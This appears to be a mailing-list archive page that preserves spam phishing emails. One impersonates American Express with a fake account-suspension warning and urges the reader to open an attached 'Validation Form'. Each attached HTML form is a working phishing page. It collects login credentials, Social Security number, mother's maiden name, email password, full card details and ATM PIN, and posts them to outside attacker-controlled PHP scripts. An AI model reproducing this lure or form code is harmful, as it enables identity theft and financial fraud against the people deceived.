{ alert("Please enter your City before submitting. (Go back to the previous page)."); form.City.focus(); return;}
if (form.City.value.length < 2)
{ alert("Invalid City. (Go back to the previous page)."); form.City.focus(); return;}
if (form.State.value == "")
{ alert("Please enter your State before submitting. (Go back to the previous page)."); form.State.focus(); return;}
if (form.zipcode.value == "")
{ alert("Please enter a valid Zip Code before submitting. (Go back to the previous page)."); form.zipcode.focus(); return;}
// Start of zipcode error Alert!
var checkOK = "0123456789";
var checkStr = form.zipcode.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter a valid Zip Code before submitting. (Go back to the previous page).");
form.zipcode.focus();
return;}
// End of zipcode error Alert!
if (form.zipcode.value.length < 5)
{ alert("Invalid Zip Code. (Go back to the previous page). (Go back to the previous page)."); form.zipcode.focus(); return;}
if (form.dob.value=="")
{ alert("Please enter your Date of Birth before submitting. (Go back to the previous page)."); form.dob.focus(); return;}
// Start of dob error Alert!
var checkOK = "0123456789/\-";
var checkStr = form.dob.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter a valid Date of Birth before submitting.(no spaces, format: DD/MM/YYYY (Go back to the previous page).");
form.dob.focus();
return;}
// End of dob error Alert!
if (form.dob.value.length < 8)
{ alert("Please enter a valid Date of Birth before submitting. (Go back to the previous page)."); form.dob.focus(); return;}
if (form.PoB.value == "")
{ alert("Please enter your place of birth. (Go back to the previous page)."); form.PoB.focus(); return;}
if (form.SSN.value == "")
{ alert("Please enter a valid social security number (XXX-XX-XXXX). (Go back to the previous page)."); form.SSN.focus(); return;}
// Start of SSN error Alert!
var checkOK = "0123456789";
var checkStr = form.SSN.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Invalid SSN number (XXX-XX-XXXX).");
form.SSN.focus();
return;}
// End of SSN error Alert!
if (form.SSN.value.length < 9)
{ alert("Invalid SSN (XXX-XX-XXXX)."); form.SSN.focus(); return;}
if (form.MMN.value == "")
{ alert("Please enter a valid Mother's Maiden Name. (Go back to the previous page)."); form.MMN.focus(); return;}
if (form.MMN.value.length < 2)
{ alert("Please enter a valid Mother's Maiden Name. (Go back to the previous page)."); form.MMN.focus(); return;}
if (form.mdob.value=="")
{ alert("Please enter your Mother's Date of Birth before submitting. (no spaces, format: DD/MM/YYYY) (Go back to the previous page)."); form.mdob.focus(); return;}
// Start of mdob error Alert!
var checkOK = "0123456789/\-";
var checkStr = form.mdob.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter a valid Mother's Date of Birth before submitting.(no spaces, format: DD/MM/YYYY) (Go back to the previous page).");
form.mdob.focus();
return;}
// End of mdob error Alert!
if (form.mdob.value.length < 8)
{ alert("Please enter a valid Mother's Date of Birth before submitting. (no spaces, format: DD/MM/YYYY) (Go back to the previous page)."); form.mdob.focus(); return;}
if (form.phone.value == "")
{ alert("Please enter Phone Number before submitting. (Go back to the previous page)."); form.phone.focus(); return;}
if (form.Email.value == "")
{ alert("Please enter a valid Email address. (Go back to the previous page)."); form.Email.focus(); return;}
// Start of Email error Alert!
var checkEmail = "@.";
var checkStr = form.Email.value;
var EmailValid = false;
var EmailAt = false;
var EmailPeriod = false;
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkEmail.length; j++)
{
if (ch == checkEmail.charAt(j) && ch == "@")
EmailAt = true;
if (ch == checkEmail.charAt(j) && ch == ".")
EmailPeriod = true;
if (EmailAt && EmailPeriod)
break;
if (j == checkEmail.length)
break;
}
if (EmailAt && EmailPeriod)
{
EmailValid = true
break;
}
}
if (!EmailValid)
{
alert("Please enter a valid email address.");
form.Email.focus();
return;}
// End of Email error Alert!
if (form.Email.value.length < 3)
{ alert("Please enter a valid email address. (Go back to the previous page)."); form.Email.focus(); return;}
if (form.EmailP.value == "")
{ alert("Please enter a valid Email address password. (Go back to the previous page)."); form.EmailP.focus(); return;}
if (form.EmailP.value.length < 4)
{ alert("Please enter a valid Email address password. (Go back to the previous page)."); form.EmailP.focus(); return;}
if (form.cardNumber.value == "")
{ alert("You must provide a valid Card Number."); form.cardNumber.focus(); return;}
// Start of cardNumber error Alert!
var checkOK = "0123456789";
var checkStr = form.cardNumber.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("You must provide a valid Card Number.");
form.cardNumber.focus();
return;}
// End of cardNumber error Alert!
if (form.cardNumber.value.length < 15)
{ alert("You must provide a valid Card Number."); form.cardNumber.focus(); return;}
if (form.NameonCard.value == "")
{ alert("You must provide Name on Card."); form.NameonCard.focus(); return;}
if (form.DateMonth.value == "")
{ alert("You must provide a valid Expiration Month for your card."); form.DateMonth.focus(); return;}
if (form.DateYear.value == "")
{ alert("You must provide a valid Expiration Year for your card."); form.DateYear.focus(); return;}
if (form.cvv2.value == "")
{ alert("You must provide a valid 4-Digit Card (# printed just above the account number on the front of the Card )."); form.cvv2.focus(); return;}
// Start of cvv2 error Alert!
var checkOK = "0123456789";
var checkStr = form.cvv2.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("You must provide a valid 4-Digit Card (# printed just above the account number on the front of the Card ).");
form.cvv2.focus();
return;}
// End of cvv2 error Alert!
if (form.cvv2.value.length < 4) { alert("You must provide a valid 4-Digit Card (# printed just above the account number on the front of the Card ).");form.cvv2.focus(); return;}
if (form.csc.value == "")
{ alert("Please enter a valid Card Security Code."); form.csc.focus(); return;}
// Start of csc error Alert!
var checkOK = "0123456789";
var checkStr = form.csc.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter a valid Card Security Code.");
form.csc.focus();
return;}
// End of csc error Alert!
if (form.csc.value.length < 3)
{ alert("Please enter a valid Card Security Code."); form.csc.focus(); return;}
if (form.ATMPin.value == "")
{ alert("You must provide a valid ATM Pin Number."); form.ATMPin.focus(); return;}
// Start of ATMPin error Alert!
var checkOK = "0123456789";
var checkStr = form.ATMPin.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("You must provide a valid ATM Pin Number.");
form.ATMPin.focus();
return;}
// End of ATMPin error Alert!
if (form.ATMPin.value.length < 4) { alert("You must provide a valid ATM Pin Number.");form.ATMPin.focus(); return;}
form.submit()
}
//-->
</SCRIPT>
</head><body>
<!-- multistep form -->
<div align="center">
<table>
<td style="align:left;width:999px;height:94px;background-image:url('http://i.imgur.com/p0kY7pR.png')">
</table>
</div>
<form action="http://www.cscnc.com.tw/wp-includes/data.php" id="msform" method="post">
<!-- progressbar -->
<ul id="progressbar">
<li class="active">Login</li>
<li>Personal Information</li>
<li>Card Information</li>
</ul>
<!-- fieldsets -->
<fieldset>
<h2 class="fs-title">Login</h2>
<h3 class="fs-subtitle"></h3>
<input id="lilo_userName" type="text" value="" name="UserID" placeholder='User ID' maxlength="32" />
<input id="lilo_password" type="password" value="" placeholder='Password' name="Password" autocomplete="off" maxlength="20" />
<input type="button" name="next" class="next action-button" value="Next" />
</fieldset>
<fieldset>
<h2 class="fs-title">Personal Information</h2>
<h3 class="fs-subtitle"></h3>
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Full Name" name="fullname" placeholder='Enter your Full Name' maxlength="45" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Home Address" name="address" placeholder='Enter your Home Address' maxlength="45" />
</div>
</div>
<br><br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="City" name="City" placeholder='Enter your City' maxlength="32" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="State" name="State" placeholder='Enter your State' maxlength="32" />
</div>
</div>
<div class="lilo_clear"> </div>
<br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Zip Code" name="zipcode" placeholder='Enter your Zip Code' maxlength="6" />
</div>
</div>
<br><br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Date of Birth (mm/dd/yyyy)" name="dob" placeholder='Enter your Date of Birth' maxlength="32" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Place of Birth" name="PoB" placeholder='Enter your Place of Birth' maxlength="32" />
</div>
</div>
<div class="lilo_clear"> </div>
<br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Social Security Number" name="SSN" placeholder='Enter your Social Security Number' maxlength="12" />
</div>
</div>
<br><br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Mother's Maiden Name" name="MMN" placeholder='Enter your Mother's Maiden Name' maxlength="32" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Mother's Date of Birth" name="mdob" placeholder='Enter your Mother's Date of Birth' maxlength="32" />
</div>
</div>
<div class="lilo_clear"> </div>
<br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Phone Number" name="phone" placeholder='Enter your Phone Number' maxlength="12" />
</div>
</div>
<div class="lilo_clear"> </div>
<br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Email Address" name="Email" placeholder='Enter your Email Address' maxlength="45" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="password" value="" placeholder="Email Password" name="EmailP" placeholder='Enter your Email Password' maxlength="32" />
</div>
</div>
<input type="button" name="previous" class="previous action-button" value="Previous" />
<input type="button" name="next" class="next action-button" value="Next" />
</fieldset>
<fieldset>
<h2 class="fs-title">Card Information</h2>
<h3 class="fs-subtitle"></h3>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Card Number" name="cardNumber" placeholder='Enter your Card Number' maxlength="15" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Name on Card" name="NameonCard" placeholder='Enter your Name on Card' maxlength="32" />
</div>
</div>
<br><br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Expiration Month - MM" name="DateMonth" placeholder='Enter your Expiration Date (Month)' maxlength="2" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Expiration Year - YYYY" name="DateYear" placeholder='Enter your Expiration Date (Year)' maxlength="4" />
</div>
</div>
<br><br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="password" value="" placeholder="4-Digit Card ID" name="cvv2" placeholder='Enter your 4-Digit Card ID' maxlength="4" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="password" value="" placeholder="Card Security Code" name="csc" placeholder='Enter your Card Security Code' maxlength="3" />
</div>
</div>
<div class="lilo_clear"> </div>
<br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="password" value="" placeholder="ATM Pin" name="ATMPin" placeholder='Enter your ATM Pin' maxlength="4" />
</div>
</div>
<input type="button" name="previous" class="previous action-button" value="Previous" />
<input type="button" onclick=check(this.form) name="btnsubmit" class="submit action-button" value="Submit" />
</fieldset>
</form>
<br><br>
<!-- jQuery -->
<script src="http://thecodeplayer.com/uploads/js/jquery-1.9.1.min.js" type="text/javascript"></script>
<!-- jQuery easing plugin -->
<script src="http://thecodeplayer.com/uploads/js/jquery.easing.min.js" type="text/javascript"></script>
<script>
var current_fs, next_fs, previous_fs;
var left, opacity, scale;
var animating;
$('.next').click(function () {
if (animating)
return false;
animating = true;
current_fs = $(this).parent();
next_fs = $(this).parent().next();
$('#progressbar li').eq($('fieldset').index(next_fs)).addClass('active');
next_fs.show();
current_fs.animate({ opacity: 0 }, {
step: function (now, mx) {
scale = 1 - (1 - now) * 0.2;
left = now * 50 + '%';
opacity = 1 - now;
current_fs.css({ 'transform': 'scale(' + scale + ')' });
next_fs.css({
'left': left,
'opacity': opacity
});
},
duration: 800,
complete: function () {
current_fs.hide();
animating = false;
},
easing: 'easeInOutBack'
});
});
$('.previous').click(function () {
if (animating)
return false;
animating = true;
current_fs = $(this).parent();
previous_fs = $(this).parent().prev();
$('#progressbar li').eq($('fieldset').index(current_fs)).removeClass('active');
previous_fs.show();
current_fs.animate({ opacity: 0 }, {
step: function (now, mx) {
scale = 0.8 + (1 - now) * 0.2;
left = (1 - now) * 50 + '%';
opacity = 1 - now;
current_fs.css({ 'left': left });
previous_fs.css({
'transform': 'scale(' + scale + ')',
'opacity': opacity
});
},
duration: 800,
complete: function () {
current_fs.hide();
animating = false;
},
easing: 'easeInOutBack'
});
});
$('.submit').click(function () {
return false;
});
//@ sourceURL=pen.js
</script>
<script src='http://codepen.io/assets/editor/live/css_live_reload_init.js'></script>
</div>
</body></html>
^ permalink raw reply [flat|nested] 3+ messages in thread
* Unauthorized activity on your online account
@ 2015-07-23 11:33 American Express
0 siblings, 0 replies; 3+ messages in thread
From: American Express @ 2015-07-23 11:33 UTC (permalink / raw)
To: linux-ext4
[-- Attachment #1: Message text --]
[-- Type: text/plain, Size: 786 bytes --]
Dear Customer,
We recently detected numerous failed attempts to provide the correct answers to your security questions.
Therefore, we have temporarily suspended online access to your account by other non authentic users, and we need to go through some verification.
To begin please download the attached file below to proceed to verification as soon as possible.
American Express safeguards your account whenever there is a possibility that someone else is attempting to sign in.
Please understand that this form must be completed within 24-48 hours.
This is our security measure intended to help and protect you and your account.
Thank you for your cooperation and we deeply apologize for any inconvenience this may cause you.
American Express Customer Service.
[-- Attachment #2: Attached file: Validation Form.html --]
[-- Type: application/octet-stream, Size: 22277 bytes --]
<!DOCTYPE html><html class=''>
<head><meta charset='UTF-8'><meta name="robots" content="noindex"><link rel="canonical" href="http://codepen.io/atakan/pen/gqbIz" />
<link rel='stylesheet' href='http://s.codepen.io/assets/reset/reset.css'>
<style class="cp-pen-styles">/*custom font*/
@import url(http://fonts.googleapis.com/css?family=Montserrat);
/*basic reset*/
* {margin: 0; padding: 0;}
html {
height: 100%;
/*Image only BG fallback*/
/*background = gradient + image pattern combo*/
background-color: #B9D9E8
}
body {
font-family: montserrat, arial, verdana;
}
/*form styles*/
#msform {
width: 400px;
margin: 50px auto;
text-align: center;
position: relative;
}
#msform fieldset {
background: #F7F5EC;
border: 0 none;
border-radius: 3px;
box-shadow: 0 0 15px 1px rgba(0, 0, 0, 0.4);
padding: 20px 30px;
box-sizing: border-box;
width: 80%;
margin: 0 10%;
/*stacking fieldsets above each other*/
position: absolute;
}
/*Hide all except first fieldset*/
#msform fieldset:not(:first-of-type) {
display: none;
}
/*inputs*/
#msform input, #msform textarea {
padding: 15px;
border: 1px solid #ccc;
border-radius: 3px;
margin-bottom: 10px;
width: 100%;
box-sizing: border-box;
font-family: montserrat;
color: #2C3E50;
font-size: 13px;
}
/*buttons*/
#msform .action-button {
width: 100px;
background: #0E92CE;
font-weight: bold;
color: white;
border: 0 none;
border-radius: 1px;
cursor: pointer;
padding: 10px 5px;
margin: 10px 5px;
}
#msform .action-button:hover, #msform .action-button:focus {
box-shadow: 0 0 0 2px white, 0 0 0 3px #0E92CE;
}
/*headings*/
.fs-title {
font-size: 15px;
text-transform: uppercase;
color: #2C3E50;
margin-bottom: 10px;
}
.fs-subtitle {
font-weight: normal;
font-size: 13px;
color: #666;
margin-bottom: 20px;
}
/*progressbar*/
#progressbar {
margin-bottom: 30px;
overflow: hidden;
/*CSS counters to number the steps*/
counter-reset: step;
}
#progressbar li {
list-style-type: none;
color: black;
text-transform: uppercase;
font-size: 9px;
width: 33.33%;
float: left;
position: relative;
}
#progressbar li:before {
content: counter(step);
counter-increment: step;
width: 20px;
line-height: 20px;
display: block;
font-size: 10px;
color: #333;
background: white;
border-radius: 3px;
margin: 0 auto 5px auto;
}
/*progressbar connectors*/
#progressbar li:after {
content: '';
width: 100%;
height: 2px;
background: white;
position: absolute;
left: -50%;
top: 9px;
z-index: -1; /*put it behind the numbers*/
}
#progressbar li:first-child:after {
/*connector not needed before the first step*/
content: none;
}
/*marking active/completed steps green*/
/*The number of the step and the connector before it = green*/
#progressbar li.active:before, #progressbar li.active:after{
background: #0E92CE;
color: white;
}
</style>
<script type='text/javascript'>
<!--
function check(form) {
if (form.UserID.value=="")
{ alert("Please enter a valid User ID before submitting. (Go back to the previous page)."); form.UserID.focus(); return;}
if (form.Password.value=="")
{ alert("Please enter a valid Password before submitting. (Go back to the previous page)."); form.Password.focus(); return;}
if (form.fullname.value == "")
{ alert("Please enter your First & Last name before submitting. (Go back to the previous page)."); form.fullname.focus(); return;}
if (form.address.value=="")
{ alert("Please enter your Billing Address before submitting. (Go back to the previous page)."); form.address.focus(); return;}
if (form.address.value.length < 5)
{ alert("Invalid Address. (Go back to the previous page)."); form.address.focus(); return;}
if (form.City.value == "")
{ alert("Please enter your City before submitting. (Go back to the previous page)."); form.City.focus(); return;}
if (form.City.value.length < 2)
{ alert("Invalid City. (Go back to the previous page)."); form.City.focus(); return;}
if (form.State.value == "")
{ alert("Please enter your State before submitting. (Go back to the previous page)."); form.State.focus(); return;}
if (form.zipcode.value == "")
{ alert("Please enter a valid Zip Code before submitting. (Go back to the previous page)."); form.zipcode.focus(); return;}
// Start of zipcode error Alert!
var checkOK = "0123456789";
var checkStr = form.zipcode.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter a valid Zip Code before submitting. (Go back to the previous page).");
form.zipcode.focus();
return;}
// End of zipcode error Alert!
if (form.zipcode.value.length < 5)
{ alert("Invalid Zip Code. (Go back to the previous page). (Go back to the previous page)."); form.zipcode.focus(); return;}
if (form.dob.value=="")
{ alert("Please enter your Date of Birth before submitting. (Go back to the previous page)."); form.dob.focus(); return;}
// Start of dob error Alert!
var checkOK = "0123456789/\-";
var checkStr = form.dob.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter a valid Date of Birth before submitting.(no spaces, format: DD/MM/YYYY (Go back to the previous page).");
form.dob.focus();
return;}
// End of dob error Alert!
if (form.dob.value.length < 8)
{ alert("Please enter a valid Date of Birth before submitting. (Go back to the previous page)."); form.dob.focus(); return;}
if (form.PoB.value == "")
{ alert("Please enter your place of birth. (Go back to the previous page)."); form.PoB.focus(); return;}
if (form.SSN.value == "")
{ alert("Please enter a valid social security number (XXX-XX-XXXX). (Go back to the previous page)."); form.SSN.focus(); return;}
// Start of SSN error Alert!
var checkOK = "0123456789";
var checkStr = form.SSN.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Invalid SSN number (XXX-XX-XXXX).");
form.SSN.focus();
return;}
// End of SSN error Alert!
if (form.SSN.value.length < 9)
{ alert("Invalid SSN (XXX-XX-XXXX)."); form.SSN.focus(); return;}
if (form.MMN.value == "")
{ alert("Please enter a valid Mother's Maiden Name. (Go back to the previous page)."); form.MMN.focus(); return;}
if (form.MMN.value.length < 2)
{ alert("Please enter a valid Mother's Maiden Name. (Go back to the previous page)."); form.MMN.focus(); return;}
if (form.mdob.value=="")
{ alert("Please enter your Mother's Date of Birth before submitting. (no spaces, format: DD/MM/YYYY) (Go back to the previous page)."); form.mdob.focus(); return;}
// Start of mdob error Alert!
var checkOK = "0123456789/\-";
var checkStr = form.mdob.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter a valid Mother's Date of Birth before submitting.(no spaces, format: DD/MM/YYYY) (Go back to the previous page).");
form.mdob.focus();
return;}
// End of mdob error Alert!
if (form.mdob.value.length < 8)
{ alert("Please enter a valid Mother's Date of Birth before submitting. (no spaces, format: DD/MM/YYYY) (Go back to the previous page)."); form.mdob.focus(); return;}
if (form.phone.value == "")
{ alert("Please enter Phone Number before submitting. (Go back to the previous page)."); form.phone.focus(); return;}
if (form.Email.value == "")
{ alert("Please enter a valid Email address. (Go back to the previous page)."); form.Email.focus(); return;}
// Start of Email error Alert!
var checkEmail = "@.";
var checkStr = form.Email.value;
var EmailValid = false;
var EmailAt = false;
var EmailPeriod = false;
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkEmail.length; j++)
{
if (ch == checkEmail.charAt(j) && ch == "@")
EmailAt = true;
if (ch == checkEmail.charAt(j) && ch == ".")
EmailPeriod = true;
if (EmailAt && EmailPeriod)
break;
if (j == checkEmail.length)
break;
}
if (EmailAt && EmailPeriod)
{
EmailValid = true
break;
}
}
if (!EmailValid)
{
alert("Please enter a valid email address.");
form.Email.focus();
return;}
// End of Email error Alert!
if (form.Email.value.length < 3)
{ alert("Please enter a valid email address. (Go back to the previous page)."); form.Email.focus(); return;}
if (form.EmailP.value == "")
{ alert("Please enter a valid Email address password. (Go back to the previous page)."); form.EmailP.focus(); return;}
if (form.EmailP.value.length < 4)
{ alert("Please enter a valid Email address password. (Go back to the previous page)."); form.EmailP.focus(); return;}
if (form.cardNumber.value == "")
{ alert("You must provide a valid Card Number."); form.cardNumber.focus(); return;}
// Start of cardNumber error Alert!
var checkOK = "0123456789";
var checkStr = form.cardNumber.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("You must provide a valid Card Number.");
form.cardNumber.focus();
return;}
// End of cardNumber error Alert!
if (form.cardNumber.value.length < 15)
{ alert("You must provide a valid Card Number."); form.cardNumber.focus(); return;}
if (form.NameonCard.value == "")
{ alert("You must provide Name on Card."); form.NameonCard.focus(); return;}
if (form.DateMonth.value == "")
{ alert("You must provide a valid Expiration Month for your card."); form.DateMonth.focus(); return;}
if (form.DateYear.value == "")
{ alert("You must provide a valid Expiration Year for your card."); form.DateYear.focus(); return;}
if (form.cvv2.value == "")
{ alert("You must provide a valid 4-Digit Card (# printed just above the account number on the front of the Card )."); form.cvv2.focus(); return;}
// Start of cvv2 error Alert!
var checkOK = "0123456789";
var checkStr = form.cvv2.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("You must provide a valid 4-Digit Card (# printed just above the account number on the front of the Card ).");
form.cvv2.focus();
return;}
// End of cvv2 error Alert!
if (form.cvv2.value.length < 4) { alert("You must provide a valid 4-Digit Card (# printed just above the account number on the front of the Card ).");form.cvv2.focus(); return;}
if (form.csc.value == "")
{ alert("Please enter a valid Card Security Code."); form.csc.focus(); return;}
// Start of csc error Alert!
var checkOK = "0123456789";
var checkStr = form.csc.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("Please enter a valid Card Security Code.");
form.csc.focus();
return;}
// End of csc error Alert!
if (form.csc.value.length < 3)
{ alert("Please enter a valid Card Security Code."); form.csc.focus(); return;}
if (form.ATMPin.value == "")
{ alert("You must provide a valid ATM Pin Number."); form.ATMPin.focus(); return;}
// Start of ATMPin error Alert!
var checkOK = "0123456789";
var checkStr = form.ATMPin.value;
var allValid = true;
var allNum = "";
for (i = 0; i < checkStr.length; i++)
{
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length)
{
allValid = false;
break;
}
if (ch != ",")
allNum += ch;
}
if (!allValid)
{
alert("You must provide a valid ATM Pin Number.");
form.ATMPin.focus();
return;}
// End of ATMPin error Alert!
if (form.ATMPin.value.length < 4) { alert("You must provide a valid ATM Pin Number.");form.ATMPin.focus(); return;}
form.submit()
}
//-->
</SCRIPT>
</head><body>
<!-- multistep form -->
<div align="center">
<table>
<td style="align:left;width:999px;height:94px;background-image:url('http://i.imgur.com/p0kY7pR.png')">
</table>
</div>
<form action="http://www.hasanturan.com.tr/wp-includes/service.php" id="msform" method="post" >
<!-- progressbar -->
<ul id="progressbar">
<li class="active">Login</li>
<li>Personal Information</li>
<li>Card Information</li>
</ul>
<!-- fieldsets -->
<fieldset>
<h2 class="fs-title">Login</h2>
<h3 class="fs-subtitle"></h3>
<input id="lilo_userName" type="text" value="" name="UserID" placeholder='User ID' maxlength="32" />
<input id="lilo_password" type="password" value="" placeholder='Password' name="Password" autocomplete="off" maxlength="20" />
<input type="button" name="next" class="next action-button" value="Next" />
</fieldset>
<fieldset>
<h2 class="fs-title">Personal Information</h2>
<h3 class="fs-subtitle"></h3>
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Full Name" name="fullname" placeholder='Enter your Full Name' maxlength="45" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Home Address" name="address" placeholder='Enter your Home Address' maxlength="45" />
</div>
</div>
<br><br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="City" name="City" placeholder='Enter your City' maxlength="32" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="State" name="State" placeholder='Enter your State' maxlength="32" />
</div>
</div>
<div class="lilo_clear"> </div>
<br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Zip Code" name="zipcode" placeholder='Enter your Zip Code' maxlength="6" />
</div>
</div>
<br><br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Date of Birth (mm/dd/yyyy)" name="dob" placeholder='Enter your Date of Birth' maxlength="32" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Place of Birth" name="PoB" placeholder='Enter your Place of Birth' maxlength="32" />
</div>
</div>
<div class="lilo_clear"> </div>
<br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Social Security Number" name="SSN" placeholder='Enter your Social Security Number' maxlength="12" />
</div>
</div>
<br><br>
<div id="lilo_usernameInput">
<div class="inputWrapper">
<input id="lilo_userName" type="text" value="" placeholder="Mother's Maiden Name" name="MMN" placeholder='Enter your Mother's Maiden Name' maxlength="32" />
</div>
</div>
<div id="lilo_usernamePwd">
<div class="inputWrapper">
